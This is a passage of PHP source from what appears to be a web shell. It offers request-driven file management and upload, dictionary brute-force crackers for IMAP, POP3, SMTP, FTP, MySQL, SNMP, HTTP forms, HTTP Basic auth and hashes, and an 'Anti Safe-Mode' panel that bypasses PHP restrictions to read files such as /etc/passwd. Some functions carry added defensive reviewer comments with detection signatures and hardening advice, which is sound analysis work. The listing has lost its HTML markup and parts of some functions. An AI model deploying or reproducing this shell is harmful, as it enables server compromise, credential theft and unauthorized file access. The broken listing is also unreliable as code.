SHA1: ".sha1_file($file)."$et"; } function listdiR($cwd,$task){ $c= getcwd(); $dh = opendir($cwd); while ($cont=readdir($dh)){ if($cont=='.' || $cont=='..')continue; $adr = $cwd.DIRECTORY_SEPARATOR.$cont; switch ($task){ case '0':if(is_file($adr))echo "[$adr]\n";if(is_dir($adr))echo "[$adr]\n";break; case '1':if(is_writeable($adr))if(is_file($adr))echo "[$adr]\n";if(is_dir($adr))echo "[$adr]\n";break; case '2':if(is_file($adr) && is_writeable($adr))echo "[$adr]\n";break; case '3':if(is_dir($adr) && is_writeable($adr))echo "[$adr]\n";break; case '4':if(is_file($adr))echo "[$adr]\n";break; case '5':if(is_dir($adr))echo "[$adr]\n";break; case '6':if(preg_match("@".$_REQUEST['search']."@",$cont)){if(is_file($adr))echo "[$adr]\n";if(is_dir($adr))echo "[$adr]\n";}break; case '7':if(strstr($cont,$_REQUEST['search'])){if(is_file($adr))echo "[$adr]\n";if(is_dir($adr))echo "[$adr]\n";}break; } if (is_dir($adr)) listdiR($adr,$_REQUEST['task']); } } if (!function_exists("posix_getpwuid") && !strstr($disablefunctions,'posix_getpwuid')) {function posix_getpwuid($u) {return 0;}} if (!function_exists("posix_getgrgid") && !strstr($disablefunctions,'posix_getgrgid')) {function posix_getgrgid($g) {return 0;}} function filemanager(){ global $windows,$msgbox,$errorbox,$t,$et,$hcwd; $cwd= getcwd(); $table = ""; $td1n="
"; $td2m=""; $td1i=""; $td2i=""; $tdnr=""; $tdw=""; if (!empty($_REQUEST['task'])){ if (!empty($_REQUEST['search'])) $_REQUEST['task'] = 7; if (!empty($_REQUEST['re'])) $_REQUEST['task'] = 6; echo "
";
listdiR($cwd,$_REQUEST['task']);
echo "
"; }else{ if (!empty($_REQUEST['cP']) || !empty($_REQUEST['mV'])|| !empty($_REQUEST['rN'])){ if (!empty($_REQUEST['cP']) || !empty($_REQUEST['mV'])){ $title="Destination"; $ad = (!empty($_REQUEST['cP']))?$_REQUEST['cP']:$_REQUEST['mV']; $dis =(!empty($_REQUEST['cP']))?'Copy':'Move'; }else{ $ad = $_REQUEST['rN']; $title ="New name"; $dis = "Rename"; } if (!!empty($_REQUEST['deS'])){ echo "
$td1n$td2m$hcwd
$title:
"; }else{ if (!empty($_REQUEST['rN'])) renamE($ad,$_REQUEST['deS']); else{ copy($ad,$_REQUEST['deS']); if (!empty($_REQUEST['mV']))unlink($ad); } } } if (!empty($_REQUEST['deL'])) { if (is_file($_REQUEST['deL'])|| is_link($_REQUEST['deL'])) unlink($_REQUEST['deL']);elseif(is_dir($_REQUEST['deL'])) { $dh = opendir($_REQUEST['deL']); $d=""; while ($cont=readdir($dh)){$d++;} if ($d>2) echo "$errorbox\"".htmlspecialchars($_REQUEST['del'])."\" is not empty!

";else rmdir($_REQUEST['del']);}} if (!empty($_FILES['uploadfile'])){ move_uploaded_file($_FILES['uploadfile']['tmp_name'],$_FILES['uploadfile']['name']); echo "$msgboxUploaded! File name: ".$_FILES['uploadfile']['name']." File size: ".$_FILES['uploadfile']['size']. "$et
"; } $select = "
Location:
"; $file=array();$dir=array();$link=array(); if($dirhandle = opendir($cwd)){ while ($cont=readdir($dirhandle)){ if (is_dir($cwd.DIRECTORY_SEPARATOR.$cont)) $dir[]= $cont; elseif (is_file($cwd.DIRECTORY_SEPARATOR.$cont)) $file[]=$cont; else $link[]=$cont; } closedir($dirhandle); sort($file);sort($dir);sort($link); echo ""; $i=0; foreach($dir as $dn){ echo ""; $i++; $own="Unknow"; $owner=posix_getpwuid(fileowner($dn)); $mdate=date("Y/m/d H:i:s",filemtime($dn)); $adate=date("Y/m/d H:i:s",fileatime($dn)); $diraction = $select.hlinK("seC=fm&workingdiR=".realpath($dn))."\">Open"; if ($owner) $own = "".$owner['name'].""; if (($i%2)==0){$cl1=$td1i;$cl2=$td1n;}else{$cl1=$td2i;$cl2=$td2m;} if (is_writeable($dn)) echo $tdw;elseif (!is_readable($dn)) echo $tdnr;else echo $cl2; echo ""; if (strlen($dn)>45)echo substr($dn,0,42)."...";else echo $dn;echo ""; echo $cl1."$own"; echo $cl1."$mdate"; echo $cl1."$adate"; echo "${cl1}D";if (is_readable($dn)) echo "R";if (is_writeable($dn)) echo "W";echo ""; echo "$cl1------"; echo $cl2.$diraction; echo "" ; flusheR(); } foreach($file as $fn){ echo ""; $i++; $own = "Unknow"; $owner = posix_getpwuid(fileowner($fn)); $fileaction=$select.hlinK("seC=openit&namE=$fn&workingdiR=$cwd")."\">Open"; $mdate = date("Y/m/d H:i:s",filemtime($fn)); $adate = date("Y/m/d H:i:s",fileatime($fn)); if ($owner) $own = "".$owner['name'].""; $size = showsizE(filesize($fn)); if (($i%2)==0){$cl1=$td1i;$cl2=$td1n;}else{$cl1=$td2i;$cl2=$td2m;} if (is_writeable($fn)) echo $tdw;elseif (!is_readable($fn)) echo $tdnr;else echo $cl2; echo ""; if (strlen($fn)>45)echo substr($fn,0,42)."...";else echo $fn;echo ""; echo $cl1."$own"; echo $cl1."$mdate"; echo $cl1."$adate"; echo "$cl1";if (is_readable($fn)) echo "R";if (is_writeable($fn)) echo "W";if (is_executable($fn)) echo "X";if (is_uploaded_file($fn)) echo "U"; echo ""; echo "$cl1$size"; echo $td2m.$fileaction; echo "" ; flusheR(); } foreach($link as $ln){ $own = "Unknow"; $i++; $owner = posix_getpwuid(fileowner($ln)); 
$linkaction=$select.hlinK("seC=openit&namE=$ln&workingdiR=$ln")."\">Open"; $mdate = date("Y/m/d H:i:s",filemtime($ln)); $adate = date("Y/m/d H:i:s",fileatime($ln)); if ($owner) $own = "".$owner['name'].""; echo ""; $size = showsizE(filesize($ln)); if (($i%2)==0){$cl1=$td1i;$cl2=$td1n;}else{$cl1=$td2i;$cl2=$td2m;} if (is_writeable($ln)) echo $tdw;elseif (!is_readable($ln)) echo $tdnr;else echo $cl2; echo ""; if (strlen($ln)>45)echo substr($ln,0,42)."...";else echo $ln;echo ""; echo $cl1."$own"; echo $cl1."$mdate"; echo $cl1."$adate"; echo "${cl1}L";if (is_readable($ln)) echo "R";if (is_writeable($ln)) echo "W";if (is_executable($ln)) echo "X"; echo ""; echo "$cl1$size"; echo $cl2.$linkaction; echo "" ; flusheR(); } } $dc = count($dir)-2; if($dc==-2)$dc=0; $fc = count($file); $lc = count($link); $total = $dc + $fc + $lc; echo "$table
NameOwnerModification timeLast changeInfoSizeActions
Find:Regular expressions $hcwd
$hcwd
$et
$td1n$td2m$hcwd$td1n Note: Max allowed file size to upload on this server is ".ini_get('upload_max_filesize')."

Summery: Total: $total Directories: $dc Files: $fc Links: $lc
Current directory status: "; if (is_readable($cwd)) echo "R";if (is_writeable($cwd)) echo "W" ;echo "
$td1n$td2m$hcwd
New:

${t}Upload:
$et"; } } function imaplogiN($host,$username,$password){ $sock=fsockopen($host,143,$n,$s,5); $b=namE(); $l=strlen($b); if(!$sock)return -1; fread($sock,1024); fputs($sock,"$b LOGIN $username $password\r\n"); $res=fgets($sock,$l+4); if ($res == "$b OK")return 1;else return 0; fclose($sock); } function pop3logiN($server,$user,$pass){ $sock=fsockopen($server,110,$en,$es,5); if(!$sock)return -1; fread($sock,1024); fwrite($sock,"user $user\n"); $r=fgets($sock); if($r{0}=='-')return 0; fwrite($sock,"pass $pass\n"); $r=fgets($sock); fclose($sock); if($r{0}=='+')return 1; return 0; } function imapcrackeR(){ global $t,$et,$errorbox,$crack; if (!empty($_REQUEST['target']) && !empty($_REQUEST['dictionary'])){ $target=$_REQUEST['target']; $type=$_REQUEST['combo']; $user=(!empty($_REQUEST['user']))?$_REQUEST['user']:""; $dictionary=fopen($_REQUEST['dictionary'],'r'); if ($dictionary){ echo "Cracking ".htmlspecialchars($target)."...
";flusheR(); while(!feof($dictionary)){ if($type){ $combo=trim(fgets($dictionary)," \n\r"); $user=substr($combo,0,strpos($combo,':')); $pass=substr($combo,strpos($combo,':')+1); }else{ $pass=trim(fgets($dictionary)," \n\r"); } $imap=imaplogiN($target,$user,$pass); if($imap==-1){echo "$errorbox Can not connect to server.$et";break;}else{ if ($imap){echo "U: $user P: $pass
";if(!$type)break;}} flusheR(); } echo "
Done
"; fclose($dictionary); } else{ echo "$errorbox Can not open dictionary.$et"; } }else echo "
${t}IMAP cracker:$crack"; } function snmpcrackeR(){ global $t,$et,$errorbox,$crack,$hcwd; if (!empty($_REQUEST['target']) && !empty($_REQUEST['dictionary'])){ $target=$_REQUEST['target']; $dictionary=fopen($_REQUEST['dictionary'],'r'); if ($dictionary){ echo "Cracking ".htmlspecialchars($target)."...
";flusheR(); while(!feof($dictionary)){ $com=trim(fgets($dictionary)," \n\r"); $res=snmpchecK($target,$com,2); if($res)echo "$com
"; flusheR(); } echo "
Done
"; fclose($dictionary); } else{ echo "$errorbox Can not open dictionary.$et"; } }else echo "
${t}SNMP cracker:
Dictionary:
Server:
"; } function pop3crackeR(){ global $t,$et,$errorbox,$crack; if (!empty($_REQUEST['target']) && !empty($_REQUEST['dictionary'])){ $target=$_REQUEST['target']; $type=$_REQUEST['combo']; $user=(!empty($_REQUEST['user']))?$_REQUEST['user']:""; $dictionary=fopen($_REQUEST['dictionary'],'r'); if ($dictionary){ echo "Cracking ".htmlspecialchars($target)."...
";flusheR(); while(!feof($dictionary)){ if($type){ $combo=trim(fgets($dictionary)," \n\r"); $user=substr($combo,0,strpos($combo,':')); $pass=substr($combo,strpos($combo,':')+1); }else{ $pass=trim(fgets($dictionary)," \n\r"); } $pop3=pop3logiN($target,$user,$pass); if($pop3==-1){echo "$errorbox Can not connect to server.$et";break;} else{ if ($pop3){echo "U: $user P: $pass
";if(!$type)break;}} flusheR(); } echo "
Done
"; fclose($dictionary); } else{ echo "$errorbox Can not open dictionary.$et"; } }else echo "
${t}POP3 cracker:$crack"; } function smtpcrackeR(){ global $t,$et,$errorbox,$crack; if (!empty($_REQUEST['target']) && !empty($_REQUEST['dictionary'])){ $target=$_REQUEST['target']; $type=$_REQUEST['combo']; $user=(!empty($_REQUEST['user']))?$_REQUEST['user']:""; $dictionary=fopen($_REQUEST['dictionary'],'r'); if ($dictionary){ echo "Cracking ".htmlspecialchars($target)."...
";flusheR(); while(!feof($dictionary)){ if($type){ $combo=trim(fgets($dictionary)," \n\r"); $user=substr($combo,0,strpos($combo,':')); $pass=substr($combo,strpos($combo,':')+1); }else{ $pass=trim(fgets($dictionary)," \n\r"); } $smtp=smtplogiN($target,$user,$pass,5); if($smtp==-1){echo "$errorbox Can not connect to server.$et";break;} else{ if ($smtp){echo "U: $user P: $pass
";if(!$type)break;}} flusheR(); } echo "
Done
"; fclose($dictionary); } else{ echo "$errorbox Can not open dictionary.$et"; } }else echo "
${t}SMTP cracker:$crack"; } function formcrackeR(){ global $errorbox,$footer,$et,$hcwd; if(!empty($_REQUEST['start'])){ $url=$_REQUEST['target']; $uf=$_REQUEST['userf']; $pf=$_REQUEST['passf']; $sf=$_REQUEST['submitf']; $sv=$_REQUEST['submitv']; $method=$_REQUEST['method']; $fail=$_REQUEST['fail']; $dic=$_REQUEST['dictionary']; $type=$_REQUEST['combo']; $user=(!empty($_REQUEST['user']))?$_REQUEST['user']:""; if(!file_exists($dic)) die("$errorbox Can not open dictionary.$et$footer"); $dictionary=fopen($dic,'r'); echo "Cracking started...
"; while(!feof($dictionary)){ if($type){ $combo=trim(fgets($dictionary)," \n\r"); $user=substr($combo,0,strpos($combo,':')); $pass=substr($combo,strpos($combo,':')+1); }else{ $pass=trim(fgets($dictionary)," \n\r"); } $url.="?$uf=$user&$pf=$pass&$sf=$sv"; $res=check_urL($url,$method,$fail,12); if (!$res){echo "U: $user P: $pass
";flusheR();if(!$type)break;} flusheR(); } fclose($dictionary); echo "Done!

"; } else echo "
HTTP Form cracker:
Dictionary:
Dictionary type:Simple (P)Combo (U:P)
Username:$hcwd
Action Page:
Method:
Username field name:
Password field name:
Submit name:
Submit value:
Fail string:
"; }
/**
 * hashcrackeR() - dictionary lookup for an MD5 or SHA-1 digest, driven by request parameters.
 *
 * Reads three request parameters: 'hash' (the digest to match), 'dictionary' (a path on the
 * server, opened for reading) and 'type'. Each dictionary line is hashed and compared with
 * the upper-cased digest; the first match is printed and the loop stops. The form text at
 * the end is printed on every call.
 *
 * Reviewer notes (defensive reading):
 * - The dictionary path is used exactly as sent, so the PHP process opens whatever readable
 *   file the requester names.
 * - A single request carrying 'hash', 'dictionary' and 'type' together is a usable signature
 *   for this function in access logs or WAF rules.
 */
function hashcrackeR(){ global $errorbox,$t,$et,$hcwd;
// All three parameters must be non-empty (empty() also rejects the string "0").
if (!empty($_REQUEST['hash']) && !empty($_REQUEST['dictionary']) && !empty($_REQUEST['type'])){
// Requester-supplied path, opened read-only with no validation.
$dictionary=fopen($_REQUEST['dictionary'],'r'); if ($dictionary){
// The digest is HTML-escaped before it is echoed back.
$hash=strtoupper($_REQUEST['hash']); echo "Cracking " . htmlspecialchars($hash)."...
";flusheR();
// Only the literal value 'MD5' selects md5; any other value selects sha1, so the
// variable-function call in the loop can reach just these two functions.
$type=($_REQUEST['type']=='MD5')?'md5':'sha1'; while(!feof($dictionary)){ $word=trim(fgets($dictionary)," \n\r");
// $word is printed without htmlspecialchars(), unlike $hash above.
if ($hash==strtoupper(($type($word)))){echo "The answer is $word
";break;} } echo "Done!
"; fclose($dictionary); } else{ echo "$errorbox Can not open dictionary.$et"; } }
// Form text; NOTE(review): the surrounding markup appears to be missing from this listing.
echo "
${t}Hash cracker:
Dictionary:
Hash:
Type:
$hcwd
"; } function pr0xy(){ global $errorbox,$et,$footer,$hcwd; echo "
Navigator: $hcwd
"; if (!empty($_REQUEST['urL'])){ $dir=""; $u=parse_url($_REQUEST['urL']); $host=$u['host'];$file=(!empty($u['path']))?$u['path']:'/'; if(substr_count($file,'/')>1)$dir=substr($file,0,(strpos($file,'/'))); $url=@fsockopen($host, 80, $errno, $errstr, 12); if(!$url)die("
$errorbox Can not connect to host!$et$footer"); fputs($url, "GET /$file HTTP/1.0\r\nAccept-Encoding: text\r\nHost: $host\r\nReferer: $host\r\nUser-Agent: Mozilla/5.0 (compatible; Konqueror/3.1; FreeBSD)\r\n\r\n"); while(!feof($url)){ $con = fgets($url); $con = str_replace("href=mailto","HrEf=mailto",$con); $con = str_replace("HREF=mailto","HrEf=mailto",$con); $con = str_replace("href=\"mailto","HrEf=\"mailto",$con); $con = str_replace("HREF=\"mailto","HrEf=\"mailto",$con); $con = str_replace("href=\'mailto","HrEf=\"mailto",$con); $con = str_replace("HREF=\'mailto","HrEf=\"mailto",$con); $con = str_replace("href=\"http","HrEf=\"".hlinK("seC=px&urL=http"),$con); $con = str_replace("HREF=\"http","HrEf=\"".hlinK("seC=px&urL=http"),$con); $con = str_replace("href=\'http","HrEf=\"".hlinK("seC=px&urL=http"),$con); $con = str_replace("HREF=\'http","HrEf=\"".hlinK("seC=px&urL=http"),$con); $con = str_replace("href=http","HrEf=".hlinK("seC=px&urL=http"),$con); $con = str_replace("HREF=http","HrEf=".hlinK("seC=px&urL=http"),$con); $con = str_replace("href=\"","HrEf=\"".hlinK("seC=px&urL=http://$host/$dir/"),$con); $con = str_replace("HREF=\"","HrEf=\"".hlinK("seC=px&urL=http://$host/$dir/"),$con); $con = str_replace("href=\"","HrEf=\'".hlinK("seC=px&urL=http://$host/$dir/"),$con); $con = str_replace("HREF=\"","HrEf=\'".hlinK("seC=px&urL=http://$host/$dir/"),$con); $con = str_replace("href=","HrEf=".hlinK("seC=px&urL=http://$host/$dir/"),$con); $con = str_replace("HREF=","HrEf=".hlinK("seC=px&urL=http://$host/$dir/"),$con); echo $con; } fclose($url); } } function mysqlclienT(){ global $t,$errorbox,$et,$hcwd; if (!empty($_REQUEST['serveR']) && !empty($_REQUEST['useR']) && !empty($_REQUEST['pasS']) && !empty($_REQUEST['querY'])){ $server=$_REQUEST['serveR'];$pass=$_REQUEST['pasS'];$user=$_REQUEST['useR'];$query=$_REQUEST['querY']; if(!empty($_REQUEST['dB']))$db=$_REQUEST['dB']; $link = @mysql_connect($server,$user,$pass); if($link){ if (!empty($db))mysql_select_db($db); 
$result=mysql_query($query,$link); echo "${t}Query result(s):$et"; echo "
";
while($data=mysql_fetch_row($result)){
foreach($data as $v) {
echo $v;
echo "\t";
}
echo "\n";
}
echo "
"; mysql_close($link); } else{ echo "$errorbox Login failed!$et
"; } } echo "
${t}MySQL cilent:
Server:
Username:
Password:
Database:
Query:
$hcwd
"; }
/**
 * phpevaL() - the "Evaler" panel.
 *
 * As it appears in this listing, the branch taken when the request carries a non-empty
 * 'code' parameter only echoes two newlines, and the form text is echoed afterwards.
 * No statement that executes 'code' is visible here.
 *
 * NOTE(review): the panel name and the 'code' parameter suggest the original ran the
 * submitted text inside markup that this listing has lost. Confirm against an intact
 * sample before deriving signatures from this text.
 */
function phpevaL(){ global $t,$hcwd;
// Only the presence of 'code' is tested; its value is not used in the visible lines.
if (!empty($_REQUEST['code'])){ echo "

"; }
// Form text, printed whether or not 'code' was sent.
echo "
${t}Evaler:
Codes:
$hcwd
"; } function whoiS(){ global $t,$hcwd; if (!empty($_REQUEST['server']) && !empty($_REQUEST['domain'])){ $server =$_REQUEST['server']; $domain=$_REQUEST['domain']."\r\n"; $ser=fsockopen($server,43,$en,$es,5); fputs($ser,$domain); echo "
";
while(!feof($ser))echo fgets($ser);
echo "
"; fclose($ser); } else{ echo "
${t}Whois:
Server:domain:$hcwd
"; } } function hexvieW(){ if (!empty($_REQUEST['filE'])){ $f = $_REQUEST['filE']; echo ""; $file = fopen($f,"r"); $i= -1; while (!feof($file)) { $ln=''; $i++; echo ""; echo ""; } } fclose($file); echo "
OffsetHexASCII
";echo str_repeat("0",(8-strlen($i * 16))).$i * 16;echo ""; for ($j=0;$j<=7;$j++){ if (!feof($file)){ $tmp = strtoupper(dechex(ord(fgetc($file)))); if (strlen($tmp)==1) $tmp = "0".$tmp; echo $tmp." "; $ln.=$tmp; } } echo ""; for ($j=7;$j<=14;$j++){ if (!feof($file)){ $tmp = strtoupper(dechex(ord(fgetc($file)))); if (strlen($tmp)==1) $tmp = "0".$tmp; echo $tmp." "; $ln.=$tmp; } } echo ""; $n=0;$asc="";$co=0; for ($k=0;$k<=16;$k++){ $co=hexdec(substr($ln,$n,2)); if (($co<=31)||(($co>=127)&&($co<=160)))$co=46; $asc.= chr($co); $n+=2; } echo htmlspecialchars($asc); echo "
"; }
/**
 * safemodE() - the "Anti Safe-Mode" panel: tries several ways to read one file named by
 * the request parameter 'file' and prints whatever each attempt returns.
 *
 * The attempts, in order: ini_restore() followed by file_get_contents(); copy() through the
 * compress.zlib:// stream wrapper into a temp file; cURL with file:// URLs (two variants);
 * and, only when 'file' is exactly "/etc/passwd", a posix_getpwuid() sweep over UIDs.
 * The form text at the end is printed on every call.
 *
 * Reviewer notes (defensive reading):
 * - safe_mode was removed in PHP 5.4, so this panel is aimed at legacy PHP configurations.
 *   NOTE(review): whether any attempt works depends on the PHP and libcurl build of the
 *   host; nothing in this listing establishes that.
 * - Function names that make a compact content signature for this block: ini_restore,
 *   curl_init with a file:// URL, posix_getpwuid in a counting loop.
 * - Where the application does not need them, listing these functions in disable_functions
 *   and isolating sites at the OS level (separate users, containers) removes what the panel
 *   relies on.
 * - File contents are echoed raw, with no HTML escaping.
 */
function safemodE(){ global $windows,$t,$hcwd;
// Everything in this branch runs only when the request carries a non-empty 'file'.
if (!empty($_REQUEST['file'])){ $i=1; echo "
\nMethod $i:(ini_restore)\n";
// Attempt 1: reset safe_mode and open_basedir to their startup values, then read the file.
ini_restore("safe_mode");ini_restore("open_basedir");
$tmp = file_get_contents($_REQUEST['file']);
echo $tmp;
$i++;
echo "\nMethod $i:(copy)\n";
// Attempt 2: copy through the compress.zlib:// wrapper into a temp file and read that back.
// The temp file (name prefix "cx") is not deleted anywhere in this function, so leftover
// cx* files in the temp directory are a forensic artifact.
$tmp=tempnam("","cx");
copy("compress.zlib://".$_REQUEST['file'], $tmp);
$fh = fopen($tmp, "r");
$data = fread($fh, filesize($tmp));
fclose($fh);
echo $data;
$i++;
// Attempts 3 and 4 are skipped when the cURL extension is not loaded.
if(function_exists("curl_init")){
echo "\nMethod $i:(curl_init)[A]\n";
// Attempt 3: plain file:// URL; the @ operators hide any warning from the error log.
$fh = @curl_init("file://".$_REQUEST['file']."");
$tmp = @curl_exec($fh);
echo $tmp;
$i++;
echo "\nMethod $i:(curl_init)[B]\n";
$i++;
// Attempt 4: file:// URL with a NUL byte ("\x00") followed by the path of this script.
// NOTE(review): presumably aimed at a path check that stops reading at the NUL byte
// - confirm against the PHP/libcurl versions in scope. curl_exec() runs twice here.
if(strstr($_REQUEST['file'],DIRECTORY_SEPARATOR))
$ch =curl_init("file:///".$_REQUEST['file']."\x00/../../../../../../../../../../../../".__FILE__);
else $ch = curl_init("file://".$_REQUEST['file']."\x00".__FILE__);
curl_exec($ch);
var_dump(curl_exec($ch));
}
// Attempt 5: only for the exact string "/etc/passwd". Rebuilds account records by asking
// posix_getpwuid() for every UID from 0 to 99998; there is no function_exists() guard.
if($_REQUEST['file'] == "/etc/passwd"){
echo "\nMethod $i:(posix)\n";
for($uid=0;$uid<99999;$uid++){
$h=posix_getpwuid($uid);
if (!empty($h))foreach($h as $v)echo "$v:";}}
$i++;
echo "
"; } echo "
${t}Anti Safe-Mode:
File:$hcwd
"; } function crackeR(){ global $et; $cwd = getcwd(); echo "
[Hash] - [SMTP] - [POP3] - [IMAP] - [FTP] - [SNMP] - [MySQL] - [HTTP form] - [HTTP Auth(basic)] - [Dictionary maker]$et"; }
/**
 * dicmakeR() - the "Dictionary maker" panel: writes word lists to a path named by the request.
 *
 * Three request-driven branches are visible:
 *  1. generator - 'range', 'output', 'min', 'max': appends generated strings to 'output';
 *  2. grab      - 'input', 'output': copies the text before the first ':' of each input
 *                 line (lines without ':' are skipped) into 'output';
 *  3. download  - 'url', 'output': hands both to downloadiT(), which is defined outside this chunk.
 * With 'combo' equal to 1, entries are written as "word:word". When neither branch 2 nor
 * branch 3 applies, the form text is printed.
 *
 * Reviewer notes (defensive reading):
 * - Every output path comes from the request and is opened for append or write, so new or
 *   truncated files owned by the web server account are the main forensic artifact.
 * - The grab branch can fall back to the shelL() helper (defined outside this chunk) with a
 *   `cat` command line; a `cat` child process of the web server is worth alerting on.
 */
function dicmakeR(){ global $errorbox,$windows,$footer,$t,$et,$hcwd;
// Combo style is on only when the request sends combo equal to 1.
if (!empty($_REQUEST['combo'])&&($_REQUEST['combo']==1)) $combo=1 ; else $combo=0;
// Branch 1 (generator). empty() also rejects "0", so min and max must be non-zero.
if (!empty($_REQUEST['range']) && !empty($_REQUEST['output']) && !empty($_REQUEST['min']) && !empty($_REQUEST['max'])){ $min = $_REQUEST['min']; $max = $_REQUEST['max']; if($max<$min)die($errorbox ."Bad input!$et". $footer); $s =$w=""; $out = $_REQUEST['output']; $r = ($_REQUEST['range']=='a' )?'a':'A'; if ($_REQUEST['range']==0) $r=0; for($i=0;$i<$min;$i++) $s.=$r;
// Request-supplied path opened in append mode; the fopen() result is not checked.
$dic = fopen($out,'a');
// NOTE(review): $r holds 'a', 'A' or 0 here; how is_nan() treats the string values depends
// on the PHP version, so which of the two loops runs is not established by this listing.
if(is_nan($r)){ while(strlen($s)<=$max){ $w = $s; if($combo)$w="$w:$w"; fwrite($dic,$w."\n"); $s++;} } else{ while(strlen($w)<=$max){ $w =(string)str_repeat("0",($min - strlen($s))).$s; if($combo)$w="$w:$w"; fwrite($dic,$w."\n"); $s++;} } fclose($dic); echo "Done"; }
// Branch 2 (grab). The input path comes from the request and is opened read-only.
if (!empty($_REQUEST['input']) && !empty($_REQUEST['output'])){ $input=fopen($_REQUEST['input'],'r'); if (!$input){ if ($windows)echo $errorbox. "Unable to read from ".htmlspecialchars($_REQUEST['input']) ."$et
"; else{
// Non-Windows fallback when fopen() failed: a `cat` command line built from $input is
// passed to shelL(). The output path is then opened for writing, which truncates it.
$input=explode("\n",shelL("cat $input")); $output=fopen($_REQUEST['output'],'w'); if ($output){ foreach ($input as $in){ $user = $in; $user = trim(fgets($in)," \n\r"); if (!strstr($user,":"))continue; $user=substr($user,0,(strpos($user,':'))); if($combo) fwrite($output,$user.":".$user."\n"); else fwrite($output,$user."\n"); } fclose($input);fclose($output); echo "Done"; } } } else{
// Normal path: keep only the text before the first ':' of every line that contains one.
$output=fopen($_REQUEST['output'],'w'); if ($output){ while (!feof($input)){ $user = trim(fgets($input)," \n\r"); if (!strstr($user,":"))continue; $user=substr($user,0,(strpos($user,':'))); if($combo) fwrite($output,$user.":".$user."\n"); else fwrite($output,$user."\n"); } fclose($input);fclose($output); echo "Done"; } else echo $errorbox." Unable to write data to ".htmlspecialchars($_REQUEST['input']) ."$et
"; } }elseif (!empty($_REQUEST['url']) && !empty($_REQUEST['output'])){
// Branch 3 (download): an outbound fetch to a request-supplied URL, saved to a
// request-supplied path. In combo mode the saved file is read back and rewritten.
$res=downloadiT($_REQUEST['url'],$_REQUEST['output']); if($combo && $res){ $file=file($_REQUEST['output']); $output=fopen($_REQUEST['output'],'w'); foreach ($file as $v)fwrite($output,"$v:$v\n"); fclose($output); } echo "Done"; }else{
// No grab or download parameters: print the form text. $temp is not used in the visible text.
$temp=whereistmP(); echo "
${t}Wordlist generator:
Range:
Min lenght:
Max lenght:
Output:
Combo style output
$hcwd

${t}Grab dictionary:
Grab from:Output:Combo style output$hcwd

${t}Download dictionary:
URL:Output:Combo style output$hcwd
";} } function calC(){ global $t,$et,$hcwd; $fu = array('-','md5','sha1','crc32','hex','ip2long','long2ip','base64_encode','base64_decode','urldecode','urlencode'); if (!empty($_REQUEST['input']) && (in_array($_REQUEST['to'],$fu))){ echo "
${t}Output:
$et

"; } echo "
${t}Convertor:
Input:Task:$hcwd
"; } function authcrackeR(){ global $errorbox,$et,$t,$crack,$hcwd; if(!empty($_REQUEST['target']) && !empty($_REQUEST['dictionary'])){ $data=''; $method=($_REQUEST['method'])?'POST':'GET'; if(strstr($_REQUEST['target'],'?')){$data=substr($_REQUEST['target'],strpos($_REQUEST['target'],'?')+1);$_REQUEST['target']=substr($_REQUEST['target'],0,strpos($_REQUEST['target'],'?'));} spliturL($_REQUEST['target'],$host,$page); $type=$_REQUEST['combo']; $user=(!empty($_REQUEST['user']))?$_REQUEST['user']:""; if($method='GET')$page.=$data; $dictionary=fopen($_REQUEST['dictionary'],'r'); echo ""; while(!feof($dictionary)){ if($type){ $combo=trim(fgets($dictionary)," \n\r"); $user=substr($combo,0,strpos($combo,':')); $pass=substr($combo,strpos($combo,':')+1); }else{ $pass=trim(fgets($dictionary)," \n\r"); } $so=fsockopen($host,80,$en,$es,5); if(!$so){echo "$errorbox Can not connect to host$et";break;} else{ $packet="$method /$page HTTP/1.0\r\nAccept-Encoding: text\r\nHost: $host\r\nReferer: $host\r\nConnection: Close\r\nAuthorization: Basic ".base64_encode("$user:$pass"); if($method=='POST')$packet.="Content-Type: application/x-www-form-urlencoded\r\nContent-Length: ".strlen($data); $packet.="\r\n\r\n"; $packet.=$data; fputs($so,$packet); $res=substr(fgets($so),9,2); fclose($so); if($res=='20')echo "U: $user P: $pass
"; flusheR(); } } echo "Done!
"; }else echo "
${t}HTTP Auth cracker:Dictionary:Dictionary type:Simple (P)Combo (U:P)Username:Server:$hcwd
"; }
/**
 * sqlcrackeR() - the "MySQL cracker" panel: tries dictionary entries as MySQL logins against
 * the server named by the request parameter 'target'.
 *
 * Request parameters read: 'target', 'dictionary' (a path on this server), 'combo'
 * (non-empty means each dictionary line is "user:password") and the optional 'user'.
 * Without 'target' and 'dictionary' only the form text is printed.
 *
 * Reviewer notes (defensive reading):
 * - The whole panel depends on the legacy mysql_* extension, which was removed in PHP 7.0;
 *   where mysql_connect() does not exist, only the error text is printed.
 * - The connect call is prefixed with @, so failed attempts raise no PHP warning on this
 *   host. The evidence is on the database side: a run of failed logins coming from the
 *   web server's address.
 * - Failed-login monitoring and rate limiting on the database, plus egress filtering from
 *   web hosts to database ports, are the controls this loop runs into.
 */
function sqlcrackeR(){ global $errorbox,$t,$et,$crack;
// Guard on the legacy extension.
if (!function_exists("mysql_connect")){ echo "$errorbox Server does n`t support MySQL$et"; } else{ if (!empty($_REQUEST['target']) && !empty($_REQUEST['dictionary'])){ $target=$_REQUEST['target']; $type=$_REQUEST['combo']; $user=(!empty($_REQUEST['user']))?$_REQUEST['user']:"";
// Dictionary path comes from the request; the target is HTML-escaped before being echoed.
$dictionary=fopen($_REQUEST['dictionary'],'r'); if ($dictionary){ echo "Cracking ".htmlspecialchars($target)."...
";
// One connection attempt per dictionary line. In combo mode the line is split at the first
// ':'; otherwise the line is the password and $user stays as sent in the request.
while(!feof($dictionary)){ if($type){ $combo=trim(fgets($dictionary)," \n\r"); $user=substr($combo,0,strpos($combo,':')); $pass=substr($combo,strpos($combo,':')+1); }else{ $pass=trim(fgets($dictionary)," \n\r"); } $sql=@mysql_connect($target,$user,$pass);
// A successful login is printed without HTML escaping; in single-user mode the loop stops there.
if($sql){echo "U: $user P: $pass (Connect)
";mysql_close($sql);if(!$type)break;} flusheR(); } echo "
Done
"; fclose($dictionary); } else{ echo "$errorbox Can not open dictionary.$et"; } } else{ echo "
${t}MySQL cracker:$crack"; } } } function ftpcrackeR(){ global $errorbox,$t,$et,$crack; if (!function_exists("ftp_connect"))echo "$errorbox Server does n`t support FTP functions$et"; else{ if (!empty($_REQUEST['target']) && !empty($_REQUEST['dictionary'])){ $target=$_REQUEST['target']; $type=$_REQUEST['combo']; $user=(!empty($_REQUEST['user']))?$_REQUEST['user']:""; $dictionary=fopen($_REQUEST['dictionary'],'r'); if ($dictionary){ echo "Cracking ".htmlspecialchars($target)."...
